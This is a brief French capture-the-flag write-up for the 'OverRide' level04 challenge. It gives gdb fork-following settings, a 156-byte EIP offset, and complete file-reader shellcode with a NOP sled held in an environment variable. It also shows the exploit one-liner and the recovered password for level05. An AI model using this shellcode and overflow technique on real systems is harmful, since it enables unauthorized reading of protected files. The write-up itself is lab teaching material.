gdb a besoin des variables suivantes:
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off

on peut donc metre notre overflow generator favoris:
https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/
on trouve rapidement que l'offset est de 156 avant EIP

puisque ptrace verifie que l on ne lance pas exec on va juste utiliser un
shellcode file reader.

on sors un shellcode file reader trouvé sur:
http://shell-storm.org/shellcode/files/shellcode-73.php

pour pouvoir run notre shellcode on va donc le metre dans une variable d'environement,
par pure supertition de mon binome on met 200 instructions NOP avant le code...

export CODE=`python -c "print('\x90' * 200 + '\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/users/level05/.pass')"`
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/users/level05/.pass"

level04@OverRide:~$ python -c "print('\x90' * 156 + '\xff\xff\xdf\x4b'[::-1])" | ./level04
Give me some shellcode, k
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
child is exiting...
